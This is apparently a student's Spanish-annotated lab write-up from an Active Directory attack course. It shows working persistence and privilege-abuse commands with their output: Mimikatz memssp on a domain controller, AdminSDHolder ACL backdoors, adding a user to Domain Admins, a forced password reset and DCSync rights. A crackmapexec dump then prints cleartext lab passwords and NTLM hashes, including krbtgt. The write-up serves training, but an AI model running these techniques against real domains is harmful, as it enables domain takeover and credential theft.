Learning Objective - 12
Custom SSP
PS C:\AD\Tools> Invoke-Mimikatz -Command '"misc::memssp"' -ComputerName dcorp-dc
.#####. mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(powershell) # misc::memssp
Injected =)
PS C:\AD\Tools> cat \\dcorp-dc\c$\windows\system32\mimilsa.log
[00000000:006d432e] dcorp\Administrator *DollarMakesEveryoneHappy
PS C:\AD\Tools> cat \\dcorp-dc\c$\windows\system32\mimilsa.log
[00000000:006d432e] dcorp\Administrator *DollarMakesEveryoneHappy
[00000000:006d82d7] dcorp\Administrator *DollarMakesEveryoneHappy
[00000000:006db07e] dcorp\Administrator *DollarMakesEveryoneHappy
AdminSDHolder
PS C:\AD\Tools> . .\PowerView.ps1
PS C:\AD\Tools> Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,dc=dollarcorp,dc=moneycorp,dc=local' -PrincipalIdentity student723 -Rights All -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(|(samAccountName=student723)(name=student723)(displayname=student723)))
VERBOSE: [Get-DomainSearcher] search base: LDAP://DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(|(samAccountName=student723)(name=student723)(displayname=student723))))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=AdminSDHolder,CN=System,dc=dollarcorp,dc=moneycorp,dc=local))
VERBOSE: [Get-DomainSearcher] search base: LDAP://DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=AdminSDHolder,CN=System,dc=dollarcorp,dc=moneycorp,dc=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Add-DomainObjectAcl] Granting principal CN=student723,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local 'All' on
CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Add-DomainObjectAcl] Granting principal CN=student723,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local rights
GUID '00000000-0000-0000-0000-000000000000' on CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
PS C:\AD\Tools>Se evidencia en el BloodHound
PS C:\AD\Tools> . .\Invoke-SDPropagator.ps1
PS C:\AD\Tools> Invoke-SDPropagator -timeoutMinutes 1 -showProgress -Verbose
VERBOSE: PDC Located at dcorp-dc.dollarcorp.moneycorp.local
VERBOSE: Initiating SD Propogation on dcorp-dc.dollarcorp.moneycorp.local
VERBOSE: Checking for start of SD PropagatorAgregando a un usuario como domain admin
validamos nuestros permisos
PS C:\ad\tools> . .\PowerView.ps1
PS C:\ad\tools> Get-DomainObjectAcl -Identity 'Domain Admins' -ResolveGUIDs | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -match "student723"}
AceType : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : None
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-13603
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
IdentityName : dcorp\student723Validamos que el usuario testad no es domain admin.
PS C:\ad\tools> net user testda /dom
The request will be processed at a domain controller for domain dollarcorp.moneycorp.local.
User name testda
Full Name test da
Comment Not what the name implies ;)
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 11/14/2022 9:06:38 AM
Password expires Never
Password changeable 11/15/2022 9:06:38 AM
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users
The command completed successfully.Ahora lo agregamos.
PS C:\ad\tools> Add-DomainGroupMember -Identity 'Domain Admins' -Members testda -Verbose
VERBOSE: [Add-DomainGroupMember] Adding member 'testda' to group 'Domain Admins'Volvemos a verificar.
PS C:\ad\tools> net user testda /dom
The request will be processed at a domain controller for domain dollarcorp.moneycorp.local.
User name testda
Full Name test da
Comment Not what the name implies ;)
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 11/14/2022 9:06:38 AM
Password expires Never
Password changeable 11/15/2022 9:06:38 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Admins *Domain Users
The command completed successfully.Tambien podemos remover usuarios.
PS C:\ad\tools> Remove-DomainGroupMember -Identity 'Domain Admins' -Members testda -Verbose
VERBOSE: [Remove-DomainGroupMember] Removing member 'testda' from group 'Domain Admins'
True
PS C:\ad\tools> net user testda /dom
The request will be processed at a domain controller for domain dollarcorp.moneycorp.local.
User name testda
Full Name test da
Comment Not what the name implies ;)
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 11/14/2022 9:06:38 AM
Password expires Never
Password changeable 11/15/2022 9:06:38 AM
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users
The command completed successfully.Forzando el cambio de clave
Agregamos los permisos para reinicio de clave.
PS C:\AD\Tools> Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,dc=dollarcorp,dc=moneycorp,dc=local' -PrincipalIdentity student723 -Rights ResetPassword -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(|(samAccountName=student723)(name=student723)(displayname=student723)))
VERBOSE: [Get-DomainSearcher] search base: LDAP://DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(|(samAccountName=student723)(name=student723)(displayname=student723))))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=AdminSDHolder,CN=System,dc=dollarcorp,dc=moneycorp,dc=local))
VERBOSE: [Get-DomainSearcher] search base: LDAP://DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=AdminSDHolder,CN=System,dc=dollarcorp,dc=moneycorp,dc=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Add-DomainObjectAcl] Granting principal CN=student723,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
'ResetPassword' on CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Add-DomainObjectAcl] Granting principal CN=student723,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local rights
GUID '00299570-246d-11d0-a768-00aa006e0529' on CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=localEjecutamos el Invoke-SDPropagator para aplicar los cambios ahora mismo.
PS C:\AD\Tools> Invoke-SDPropagator -timeoutMinutes 1 -showProgress -Verbose
VERBOSE: PDC Located at dcorp-dc.dollarcorp.moneycorp.local
VERBOSE: Initiating SD Propogation on dcorp-dc.dollarcorp.moneycorp.local
VERBOSE: Checking for start of SD PropagatorVerificamos los permisos:
PS C:\ad\tools> Get-DomainObjectAcl -Identity 'Domain Admins' -ResolveGUIDs | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -match "student723"}
AceQualifier : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ExtendedRight
ObjectAceType : User-Force-Change-Password
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : None
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-13603
AccessMask : 256
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : dcorp\student723
intentando reiniciar la clave.
PS C:\ad\tools> Set-DomainUserPassword -Identity testda -AccountPassword (ConvertTo-SecureString "Bromita123!" -AsPlainText -Force) -Verbose
VERBOSE: [Set-DomainUserPassword] Attempting to set the password for user 'testda'
VERBOSE: [Set-DomainUserPassword] Password for user 'testda' successfully resetSe recomiendo segun lo analizado en las pruebas, que nose maneje mas de 1 permisos por acl en el AdminSDHolder.
Rights Abuse
Validamos si puede realizar DcSync.
$ crackmapexec smb 172.16.2.1 -u student723 -p 'hT3qDFRHGzVpJtym' --ntds
SMB 172.16.2.1 445 DCORP-DC [*] Windows 10.0 Build 20348 x64 (name:DCORP-DC) (domain:dollarcorp.moneycorp.local) (signing:True) (SMBv1:False)
SMB 172.16.2.1 445 DCORP-DC [+] dollarcorp.moneycorp.local\student723:hT3qDFRHGzVpJtym
SMB 172.16.2.1 445 DCORP-DC [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
SMB 172.16.2.1 445 DCORP-DC [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 172.16.2.1 445 DCORP-DC [-] DRSR SessionError: code: 0x20f7 - ERROR_DS_DRA_BAD_DN - The distinguished name specified for this replication operation is invalid.
Luego le asignamos los permisos:
PS C:\AD\Tools> Add-DomainObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalIdentity student723 -Rights All -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(|(samAccountName=student723)(name=student723)(displayname=student723)))
VERBOSE: [Get-DomainSearcher] search base: LDAP://DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(|(samAccountName=student723)(name=student723)(displayname=student723))))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (|(distinguishedname=DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base: LDAP://DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string: (&(|(distinguishedname=DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Add-DomainObjectAcl] Granting principal CN=student723,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local 'All' on
DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Add-DomainObjectAcl] Granting principal CN=student723,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local rights
GUID '00000000-0000-0000-0000-000000000000' on DC=dollarcorp,DC=moneycorp,DC=localSe puede validar el permiso asignado en el bloodhound.
Probamos de nuevo el dcsync.
$ crackmapexec smb 172.16.2.1 -u student723 -p 'hT3qDFRHGzVpJtym' --ntds
SMB 172.16.2.1 445 DCORP-DC [*] Windows 10.0 Build 20348 x64 (name:DCORP-DC) (domain:dollarcorp.moneycorp.local) (signing:True) (SMBv1:False)
SMB 172.16.2.1 445 DCORP-DC [+] dollarcorp.moneycorp.local\student723:hT3qDFRHGzVpJtym
SMB 172.16.2.1 445 DCORP-DC [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
SMB 172.16.2.1 445 DCORP-DC [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 172.16.2.1 445 DCORP-DC Administrator:500:aad3b435b51404eeaad3b435b51404ee:af0686cc0ca8f04df42210c9ac980760:::
SMB 172.16.2.1 445 DCORP-DC Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 172.16.2.1 445 DCORP-DC krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4e9815869d2090ccfca61c1fe0d23986:::
SMB 172.16.2.1 445 DCORP-DC sqladmin\sqladmin:1113:aad3b435b51404eeaad3b435b51404ee:07e8be316e3da9a042a9cb681df19bf5:::
SMB 172.16.2.1 445 DCORP-DC websvc\websvc:1114:aad3b435b51404eeaad3b435b51404ee:cc098f204c5887eaa8253e7c2749156f:::
SMB 172.16.2.1 445 DCORP-DC srvadmin\srvadmin:1115:aad3b435b51404eeaad3b435b51404ee:a98e18228819e8eec3dfa33cb68b0728:::
SMB 172.16.2.1 445 DCORP-DC appadmin\appadmin:1117:aad3b435b51404eeaad3b435b51404ee:d549831a955fee51a43c83efb3928fa7:::
SMB 172.16.2.1 445 DCORP-DC svcadmin\svcadmin:1118:aad3b435b51404eeaad3b435b51404ee:b38ff50264b74508085d82c69794a4d8:::
SMB 172.16.2.1 445 DCORP-DC testda\testda:1119:aad3b435b51404eeaad3b435b51404ee:a16452f790729fa34e8f3a08f234a82c:::
SMB 172.16.2.1 445 DCORP-DC mgmtadmin\mgmtadmin:1120:aad3b435b51404eeaad3b435b51404ee:95e2cd7ff77379e34c6e46265e75d754:::
Asi como se dio todos los permisos hacia el dc, tambien se puede dar permisos específicamente para DCSync.
Add-DomainObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalIdentity student723 -Rights DCSync -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -VerboseLast updated
